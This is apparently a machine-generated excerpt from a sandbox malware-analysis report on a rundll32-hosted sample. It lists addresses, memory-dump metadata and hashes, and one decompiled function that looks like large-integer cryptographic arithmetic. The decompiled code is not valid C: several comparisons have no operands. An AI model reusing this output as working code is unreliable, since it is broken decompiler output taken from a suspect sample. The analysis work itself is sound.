                                        0x21ef3065c56
                                        0x21ef3065c59
                                        0x21ef3065c61
                                        0x21ef3065c6a
                                        0x21ef3065c6f
                                        0x21ef3065c72
                                        0x21ef3065c76
                                        0x21ef3065c7b
                                        0x21ef3065c7e
                                        0x21ef3065c8e
                                        0x21ef3065c9c
                                        0x21ef3065cab
                                        0x21ef3065caf
                                        0x21ef3065cbe
                                        0x21ef3065cc2
                                        0x21ef3065cca
                                        0x21ef3065ce6
                                        0x21ef3065cea
                                        0x21ef3065cf2
                                        0x21ef3065d01
                                        0x21ef3065d09
                                        0x21ef3065d12
                                        0x21ef3065d14
                                        0x21ef3065d1b
                                        0x21ef3065d1e
                                        0x21ef3065d21
                                        0x21ef3065d24
                                        0x21ef3065d2b
                                        0x21ef3065d31
                                        0x21ef3065d50
                                        0x21ef3065d58
                                        0x21ef3065d67
                                        0x21ef3065d6e
                                        0x21ef3065d76
                                        0x21ef3065d92
                                        0x21ef3065d96
                                        0x21ef3065d9e
                                        0x21ef3065dad
                                        0x21ef3065db0
                                        0x21ef3065db8
                                        0x21ef3065dc1
                                        0x21ef3065dc7
                                        0x21ef3065dca
                                        0x21ef3065dce
                                        0x21ef3065dd0
                                        0x21ef3065dde
                                        0x21ef3065df7
                                        0x21ef3065dff
                                        0x21ef3065e0e
                                        0x21ef3065e11
                                        0x21ef3065e18
                                        0x21ef3065e20
                                        0x21ef3065e3c
                                        0x21ef3065e40
                                        0x21ef3065e48
                                        0x21ef3065e57
                                        0x21ef3065e5f
                                        0x21ef3065e68
                                        0x21ef3065e6b
                                        0x21ef3065e72
                                        0x21ef3065e79
                                        0x21ef3065ea8
                                        0x21ef3065eb0
                                        0x21ef3065ebf
                                        0x21ef3065ec7
                                        0x21ef3065edd
                                        0x21ef3065ee1
                                        0x21ef3065eec
                                        0x21ef3065eff
                                        0x21ef3065f07
                                        0x21ef3065f0b
                                        0x21ef3065f15

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31e3b7c082f65b695226498d53966589e12bef04b774bf150734c91cb6e4500f
                                        • Instruction ID: e239dff334601b97f1dce3a6bccbb89a115769d02882ab0b4a743452510979e2
                                        • Opcode Fuzzy Hash: 31e3b7c082f65b695226498d53966589e12bef04b774bf150734c91cb6e4500f
                                        • Instruction Fuzzy Hash: 3E52A1736301B44BE3514F2E585CD6A3698F366789FC35206FB8187A81C93DBA16DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3098950 Relevance: .7, Instructions: 690COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33dc1acb22e4eda7845a980b6a38efd86fb36dd83f01a3930f08ffabbc344d86
                                        • Instruction ID: 69919a679b8b7ed3f85dc72c189b255fa971b774eea06aa938c3df2bfc05be35
                                        • Opcode Fuzzy Hash: 33dc1acb22e4eda7845a980b6a38efd86fb36dd83f01a3930f08ffabbc344d86
                                        • Instruction Fuzzy Hash: 0362A173215F998AEB80CF65C8155DE37B2F388789B9A9113EE8C53715DA3CD22AC701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3066310 Relevance: .6, Instructions: 597COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2aa3f3a9f7ae7718ff181e15156be58ba4c42ce4d0bed5918b3f27e3905f666d
                                        • Instruction ID: 59ac2cca2396c0a09fbd95931592eec44a70c9b8f4cfefd09ca236c6f27a7a6d
                                        • Opcode Fuzzy Hash: 2aa3f3a9f7ae7718ff181e15156be58ba4c42ce4d0bed5918b3f27e3905f666d
                                        • Instruction Fuzzy Hash: 8412F7E3B3C1B04BE36D8B29E851B69BED0F395749B486019FA96D3B42D53CCA519F00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3092050 Relevance: .5, Instructions: 541COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 99%
                                        			E0000021E21EF3092050(void* __eax, void* __ecx, signed int __rbx, long long __rcx, signed int __rdx, long long __rsi, long long __rbp, signed int __r8, signed int __r11, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t264;
				void* _t282;
				void* _t284;
				void* _t286;
				signed long long _t297;
				void* _t302;
				signed long long _t304;
				signed long long _t308;
				signed long long _t312;
				signed long long _t316;
				signed long long _t320;
				signed long long _t324;
				signed long long _t328;
				signed long long _t332;
				signed long long _t336;
				signed long long _t340;
				signed long long _t344;
				signed long long _t348;
				signed long long _t352;
				signed long long _t356;
				unsigned long long _t361;
				signed long long _t364;
				signed long long _t365;
				void* _t411;
				void* _t419;
				void* _t428;
				void* _t436;
				void* _t441;
				unsigned long long _t452;
				signed long long _t455;
				signed long long _t456;
				signed long long _t458;
				signed long long _t459;
				signed long long _t461;
				signed long long _t462;
				signed long long _t464;
				signed long long _t465;
				signed long long _t467;
				signed long long _t468;
				signed long long _t470;
				signed long long _t471;
				signed long long _t473;
				signed long long _t474;
				signed long long _t476;
				signed long long _t477;
				signed long long _t479;
				signed long long _t480;
				signed long long _t482;
				signed long long _t483;
				signed long long _t485;
				signed long long _t486;
				signed long long _t488;
				signed long long _t489;
				signed long long _t491;
				signed long long _t492;
				signed long long _t494;
				signed long long _t495;
				signed long long _t497;
				unsigned long long _t499;
				signed long long _t500;
				unsigned long long _t502;
				signed long long _t503;
				unsigned long long _t505;
				signed long long _t506;
				unsigned long long _t508;
				signed long long _t509;
				unsigned long long _t511;
				signed long long _t512;
				unsigned long long _t514;
				signed long long _t515;
				unsigned long long _t517;
				signed long long _t518;
				unsigned long long _t520;
				signed long long _t521;
				unsigned long long _t523;
				signed long long _t524;
				unsigned long long _t526;
				signed long long _t527;
				unsigned long long _t529;
				signed long long _t530;
				unsigned long long _t532;
				signed long long _t533;
				unsigned long long _t535;
				signed long long _t536;
				unsigned long long _t538;
				signed long long _t541;
				signed long long _t542;
				signed long long _t544;
				signed long long _t547;
				signed long long _t549;
				signed long long _t551;
				signed long long _t553;
				signed long long _t555;
				signed long long _t557;
				signed long long _t559;
				signed long long _t561;
				signed long long _t563;
				signed long long _t565;
				signed long long _t567;
				signed long long _t569;
				signed long long _t571;
				void* _t577;
				intOrPtr _t584;
				void* _t585;

				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_a8 = __rcx;
				_t541 =  *__rdx >> 0x20;
				r11d = r9d;
				_t497 =  *__r8 >> 0x20;
				_t542 = _t541 * _t497;
				_t361 = __rdx * _t497 + _t541 * __r11;
				_t294 =  >=  ? _t542 : _t542 + 0;
				_t295 = ( >=  ? _t542 : _t542 + 0) + (_t361 >> 0x20);
				 *((long long*)(__rcx)) = __rbx * __r11 + (_t361 << 0x20);
				_t411 =  >=  ? ( >=  ? _t542 : _t542 + 0) + (_t361 >> 0x20) : ( >=  ? _t542 : _t542 + 0) + (_t361 >> 0x20) + 1;
				r8d = r10d;
				_t364 =  *__rdx >> 0x20;
				r9d = __ecx;
				_t297 =  *(__r8 + 8) >> 0x20;
				_t365 = _t364 * _t297;
				_t452 = __r8 * _t297 + _t364 * _t497;
				_t299 =  >=  ? _t365 : _t365 + 0;
				_t300 = ( >=  ? _t365 : _t365 + 0) + (_t452 >> 0x20);
				_t544 = _t542 * _t497 + (_t452 << 0x20);
				r11d = r8d;
				_t190 =  >=  ? ( >=  ? _t365 : _t365 + 0) + (_t452 >> 0x20) : _t300 + 1;
				r9d = r11d;
				_t302 =  >=  ?  >=  ? ( >=  ? _t365 : _t365 + 0) + (_t452 >> 0x20) : _t300 + 1 : ( >=  ? ( >=  ? _t365 : _t365 + 0) + (_t452 >> 0x20) : _t300 + 1) + 1;
				_t436 = _t302;
				asm("dec eax");
				r15d = 0;
				dil = _t436 - _t302 > 0;
				r10d = __ecx;
				_t455 =  *(__rdx + 8) >> 0x20;
				_t304 =  *__r8 >> 0x20;
				_t456 = _t455 * _t304;
				_t499 = _t497 * _t304 + _t455 * _t544;
				_t368 =  >=  ? _t456 : 0 + _t456;
				_t13 = _t411 + 1; // 0x1
				_t369 = ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20);
				_t500 = _t499 << 0x20;
				_t14 = _t369 + 1; // 0x100000001
				_t547 = __r11 * _t544 + _t500;
				_t306 =  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14;
				 *((long long*)(__rcx + 8)) = _t544 + _t411 + _t547;
				r11d = r8d;
				_t17 = _t306 + 1; // 0x100000002
				r9d = r11d;
				_t196 =  >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17;
				_t437 = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17);
				r10d = __ecx;
				_t282 =  >=  ? _t411 : _t13;
				_t308 =  *__r8 >> 0x20;
				_t458 =  *(__rdx + 0x10) >> 0x20;
				_t459 = _t458 * _t308;
				_t502 = _t500 * _t308 + _t458 * _t544;
				_t371 =  >=  ? _t459 : _t459 + 0;
				_t372 = ( >=  ? _t459 : _t459 + 0) + (_t502 >> 0x20);
				_t503 = _t502 << 0x20;
				_t20 = _t372 + 1; // 0x100000001
				_t549 = _t547 * _t544 + _t503;
				_t310 =  >=  ? ( >=  ? _t459 : _t459 + 0) + (_t502 >> 0x20) : _t20;
				_t438 = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17) + _t549;
				r11d = r8d;
				r9d = r11d;
				_t21 = _t310 + 1; // 0x100000002
				_t202 =  >=  ?  >=  ? ( >=  ? _t459 : _t459 + 0) + (_t502 >> 0x20) : _t20 : _t21;
				r10d = __ecx;
				_t577 = _t282 + ( >=  ?  >=  ? ( >=  ? _t459 : _t459 + 0) + (_t502 >> 0x20) : _t20 : _t21);
				_t312 =  *(__r8 + 8) >> 0x20;
				_t461 =  *(__rdx + 8) >> 0x20;
				_t26 = _t282 + 1; // 0x1
				_t462 = _t461 * _t312;
				_t505 = _t503 * _t312 + _t461 * _t544;
				_t374 =  >=  ? _t462 : _t462 + 0;
				_t375 = ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20);
				_t506 = _t505 << 0x20;
				_t28 = _t375 + 1; // 0x100000001
				_t551 = _t549 * _t544 + _t506;
				_t314 =  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28;
				_t439 = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17) + _t549 + _t551;
				_t29 = _t314 + 1; // 0x100000002
				_t208 =  >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29;
				_t578 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29);
				_t413 =  >=  ? _t282 : _t26;
				r10d = __ecx;
				_t316 =  *(__r8 + 0x10) >> 0x20;
				r11d = r8d;
				_t31 = _t413 + 1; // 0x2
				_t464 =  *__rdx >> 0x20;
				r9d = r11d;
				_t465 = _t464 * _t316;
				_t508 = _t506 * _t316 + _t464 * _t544;
				_t377 =  >=  ? _t465 : _t465 + 0;
				_t378 = ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20);
				_t509 = _t508 << 0x20;
				_t33 = _t378 + 1; // 0x100000001
				_t553 = _t551 * _t544 + _t509;
				_t318 =  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33;
				_t440 = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17) + _t549 + _t551 + _t553;
				_t34 = _t318 + 1; // 0x100000002
				_t214 =  >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34;
				_t579 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34);
				_t284 =  >=  ?  >=  ? _t282 : _t26 : _t31;
				 *((long long*)(_a8 + 0x10)) = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17) + _t549 + _t551 + _t553;
				r10d = __ecx;
				_t320 =  *(__r8 + 0x18) >> 0x20;
				r11d = r8d;
				_t467 =  *__rdx >> 0x20;
				r9d = r11d;
				_t468 = _t467 * _t320;
				_t511 = _t509 * _t320 + _t467 * _t544;
				_t380 =  >=  ? _t468 : _t468 + 0;
				_t381 = ( >=  ? _t468 : _t468 + 0) + (_t511 >> 0x20);
				_t512 = _t511 << 0x20;
				_t40 = _t381 + 1; // 0x100000001
				_t555 = _t553 * _t544 + _t512;
				_t322 =  >=  ? ( >=  ? _t468 : _t468 + 0) + (_t511 >> 0x20) : _t40;
				_t580 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555;
				r11d = r8d;
				r9d = r11d;
				_t41 = _t322 + 1; // 0x100000002
				_t221 =  >=  ?  >=  ? ( >=  ? _t468 : _t468 + 0) + (_t511 >> 0x20) : _t40 : _t41;
				r10d = __ecx;
				_t441 = _t284 + ( >=  ?  >=  ? ( >=  ? _t468 : _t468 + 0) + (_t511 >> 0x20) : _t40 : _t41);
				_t470 =  *(__rdx + 8) >> 0x20;
				_t324 =  *(__r8 + 0x10) >> 0x20;
				_t471 = _t470 * _t324;
				_t514 = _t512 * _t324 + _t470 * _t544;
				_t383 =  >=  ? _t471 : _t471 + 0;
				_t47 = _t284 + 1; // 0x1
				_t384 = ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20);
				_t515 = _t514 << 0x20;
				_t49 = _t384 + 1; // 0x100000001
				_t557 = _t555 * _t544 + _t515;
				_t326 =  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49;
				_t581 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555 + _t557;
				r11d = r8d;
				r9d = r11d;
				_t50 = _t326 + 1; // 0x100000002
				_t227 =  >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50;
				_t442 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50);
				r10d = __ecx;
				_t415 =  >=  ? _t284 : _t47;
				_t328 =  *(__r8 + 8) >> 0x20;
				_t473 =  *(__rdx + 0x10) >> 0x20;
				_t474 = _t473 * _t328;
				_t517 = _t515 * _t328 + _t473 * _t544;
				_t386 =  >=  ? _t474 : _t474 + 0;
				_t53 = _t415 + 1; // 0x2
				_t387 = ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20);
				_t518 = _t517 << 0x20;
				_t55 = _t387 + 1; // 0x100000001
				_t559 = _t557 * _t544 + _t518;
				_t330 =  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55;
				_t582 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555 + _t557 + _t559;
				r11d = r8d;
				r9d = r11d;
				_t56 = _t330 + 1; // 0x100000002
				_t233 =  >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56;
				_t443 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56);
				r10d = __ecx;
				_t427 =  >=  ?  >=  ? _t284 : _t47 : _t53;
				_t332 =  *__r8 >> 0x20;
				_t476 =  *(__rdx + 0x18) >> 0x20;
				_t57 = _t427 + 1; // 0x3
				_t477 = _t476 * _t332;
				_t520 = _t518 * _t332 + _t476 * _t544;
				_t389 =  >=  ? _t477 : _t477 + 0;
				_t390 = ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20);
				_t521 = _t520 << 0x20;
				_t59 = _t390 + 1; // 0x100000001
				_t561 = _t559 * _t544 + _t521;
				_t334 =  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59;
				_t583 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555 + _t557 + _t559 + _t561;
				_t60 = _t334 + 1; // 0x100000002
				_t239 =  >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60;
				_t444 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60);
				_t286 =  >=  ?  >=  ?  >=  ? _t284 : _t47 : _t53 : _t57;
				 *((long long*)(_a8 + 0x18)) = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555 + _t557 + _t559 + _t561;
				r10d = __ecx;
				_t336 =  *(__r8 + 8) >> 0x20;
				r11d = r8d;
				_t479 =  *(__rdx + 0x18) >> 0x20;
				r9d = r11d;
				_t480 = _t479 * _t336;
				_t523 = _t521 * _t336 + _t479 * _t544;
				_t392 =  >=  ? _t480 : _t480 + 0;
				_t393 = ( >=  ? _t480 : _t480 + 0) + (_t523 >> 0x20);
				_t524 = _t523 << 0x20;
				_t67 = _t393 + 1; // 0x100000001
				_t563 = _t561 * _t544 + _t524;
				_t338 =  >=  ? ( >=  ? _t480 : _t480 + 0) + (_t523 >> 0x20) : _t67;
				_t445 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60) + _t563;
				r11d = r8d;
				r9d = r11d;
				_t68 = _t338 + 1; // 0x100000002
				_t246 =  >=  ?  >=  ? ( >=  ? _t480 : _t480 + 0) + (_t523 >> 0x20) : _t67 : _t68;
				r10d = __ecx;
				_t428 = _t286 + ( >=  ?  >=  ? ( >=  ? _t480 : _t480 + 0) + (_t523 >> 0x20) : _t67 : _t68);
				_t340 =  *(__r8 + 0x10) >> 0x20;
				_t482 =  *(__rdx + 0x10) >> 0x20;
				_t483 = _t482 * _t340;
				_t74 = _t286 + 1; // 0x1
				_t526 = _t524 * _t340 + _t482 * _t544;
				_t395 =  >=  ? _t483 : _t483 + 0;
				_t396 = ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20);
				_t527 = _t526 << 0x20;
				_t76 = _t396 + 1; // 0x100000001
				_t565 = _t563 * _t544 + _t527;
				_t342 =  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76;
				_t446 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60) + _t563 + _t565;
				r11d = r8d;
				r9d = r11d;
				_t77 = _t342 + 1; // 0x100000002
				_t252 =  >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77;
				_t429 = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77);
				r10d = __ecx;
				_t418 =  >=  ? _t286 : _t74;
				_t485 =  *(__rdx + 8) >> 0x20;
				_t344 =  *(__r8 + 0x18) >> 0x20;
				_t486 = _t485 * _t344;
				_t529 = _t527 * _t344 + _t485 * _t544;
				_t584 = _a8;
				_t80 = _t418 + 1; // 0x2
				_t399 =  >=  ? _t486 : 0 + _t486;
				_t400 = ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20);
				_t530 = _t529 << 0x20;
				_t81 = _t400 + 1; // 0x100000001
				_t567 = _t565 * _t544 + _t530;
				_t346 =  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81;
				_t447 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60) + _t563 + _t565 + _t567;
				 *((long long*)(_t584 + 0x20)) = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60) + _t563 + _t565 + _t567;
				r11d = r8d;
				_t84 = _t346 + 1; // 0x100000002
				r9d = r11d;
				_t258 =  >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84;
				_t430 = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77) + ( >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84);
				r10d = __ecx;
				_t288 =  >=  ?  >=  ? _t286 : _t74 : _t80;
				_t348 =  *(__r8 + 0x18) >> 0x20;
				_t488 =  *(__rdx + 0x10) >> 0x20;
				_t489 = _t488 * _t348;
				_t532 = _t530 * _t348 + _t488 * _t544;
				_t402 =  >=  ? _t489 : _t489 + 0;
				_t403 = ( >=  ? _t489 : _t489 + 0) + (_t532 >> 0x20);
				_t533 = _t532 << 0x20;
				_t88 = _t403 + 1; // 0x100000001
				_t569 = _t567 * _t544 + _t533;
				_t350 =  >=  ? ( >=  ? _t489 : _t489 + 0) + (_t532 >> 0x20) : _t88;
				_t431 = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77) + ( >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84) + _t569;
				r11d = r8d;
				r9d = r11d;
				_t89 = _t350 + 1; // 0x100000002
				_t264 =  >=  ?  >=  ? ( >=  ? _t489 : _t489 + 0) + (_t532 >> 0x20) : _t88 : _t89;
				r10d = __ecx;
				_t419 = _t264 + ( >=  ?  >=  ? _t286 : _t74 : _t80);
				r15b = _t419 - _t264 > 0;
				_t352 =  *(__r8 + 0x10) >> 0x20;
				_t491 =  *(__rdx + 0x18) >> 0x20;
				_t492 = _t491 * _t352;
				_t535 = _t533 * _t352 + _t491 * _t544;
				_t405 =  >=  ? _t492 : _t492 + 0;
				_t406 = ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20);
				_t536 = _t535 << 0x20;
				_t93 = _t406 + 1; // 0x100000001
				_t571 = _t569 * _t544 + _t536;
				_t354 =  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93;
				_t432 = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77) + ( >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84) + _t569 + _t571;
				_t94 = _t354 + 1; // 0x100000002
				_t270 =  >=  ?  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93 : _t94;
				 *((long long*)(_t584 + 0x28)) = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77) + ( >=  ?  >=  ? ( >=  ? _t486 : 0 + _t486) + (_t529 >> 0x20) : _t81 : _t84) + _t569 + _t571;
				_t97 = _t585 + 1; // 0x1
				_t420 = _t419 + ( >=  ?  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93 : _t94);
				r10d = __ecx;
				_t290 =  >=  ? _t585 : _t97;
				r11d = r8d;
				_t356 =  *(__r8 + 0x18) >> 0x20;
				r9d = r11d;
				_t494 =  *(__rdx + 0x18) >> 0x20;
				_t495 = _t494 * _t356;
				_t538 = _t536 * _t356 + _t494 * _t544;
				_t408 =  >=  ? _t495 : _t495 + 0;
				_t102 = ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) + 1; // 0x100000001
				_t358 =  >=  ? ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) : _t102;
				_t421 = _t419 + ( >=  ?  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93 : _t94) + _t571 * _t544 + (_t538 << 0x20);
				 *((long long*)(_t584 + 0x30)) = _t419 + ( >=  ?  >=  ? ( >=  ? _t492 : _t492 + 0) + (_t535 >> 0x20) : _t93 : _t94) + _t571 * _t544 + (_t538 << 0x20);
				_t104 = _t358 + 1; // 0x100000002
				_t276 =  >=  ?  >=  ? ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) : _t102 : _t104;
				_t277 = ( >=  ?  >=  ? ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) : _t102 : _t104) + ( >=  ? _t585 : _t97);
				 *((long long*)(_t584 + 0x38)) = ( >=  ?  >=  ? ( >=  ? _t495 : _t495 + 0) + (_t538 >> 0x20) : _t102 : _t104) + ( >=  ? _t585 : _t97);
				return __eax;
			}











































































































                                        0x21ef3092050
                                        0x21ef3092055
                                        0x21ef309205a
                                        0x21ef309205f
                                        0x21ef309207f
                                        0x21ef3092085
                                        0x21ef309208f
                                        0x21ef30920a1
                                        0x21ef30920a5
                                        0x21ef30920b2
                                        0x21ef30920ba
                                        0x21ef30920cf
                                        0x21ef30920d6
                                        0x21ef30920e1
                                        0x21ef30920e4
                                        0x21ef30920e8
                                        0x21ef30920f2
                                        0x21ef30920fa
                                        0x21ef30920fe
                                        0x21ef309210b
                                        0x21ef3092113
                                        0x21ef309212c
                                        0x21ef3092136
                                        0x21ef3092139
                                        0x21ef309213d
                                        0x21ef309214b
                                        0x21ef3092152
                                        0x21ef3092155
                                        0x21ef3092159
                                        0x21ef3092166
                                        0x21ef309216a
                                        0x21ef309216d
                                        0x21ef3092171
                                        0x21ef309217c
                                        0x21ef3092187
                                        0x21ef3092190
                                        0x21ef3092198
                                        0x21ef309219c
                                        0x21ef309219f
                                        0x21ef30921a7
                                        0x21ef30921ab
                                        0x21ef30921b1
                                        0x21ef30921bb
                                        0x21ef30921cd
                                        0x21ef30921d0
                                        0x21ef30921d4
                                        0x21ef30921d7
                                        0x21ef30921df
                                        0x21ef30921e2
                                        0x21ef30921e8
                                        0x21ef30921ec
                                        0x21ef30921f4
                                        0x21ef30921ff
                                        0x21ef3092203
                                        0x21ef3092210
                                        0x21ef309221c
                                        0x21ef309221f
                                        0x21ef3092227
                                        0x21ef309222b
                                        0x21ef3092231
                                        0x21ef3092235
                                        0x21ef309223b
                                        0x21ef309223e
                                        0x21ef3092241
                                        0x21ef3092245
                                        0x21ef309224e
                                        0x21ef3092251
                                        0x21ef309225e
                                        0x21ef3092266
                                        0x21ef309226a
                                        0x21ef3092275
                                        0x21ef3092279
                                        0x21ef3092286
                                        0x21ef309228e
                                        0x21ef3092291
                                        0x21ef3092299
                                        0x21ef309229d
                                        0x21ef30922a3
                                        0x21ef30922a7
                                        0x21ef30922ad
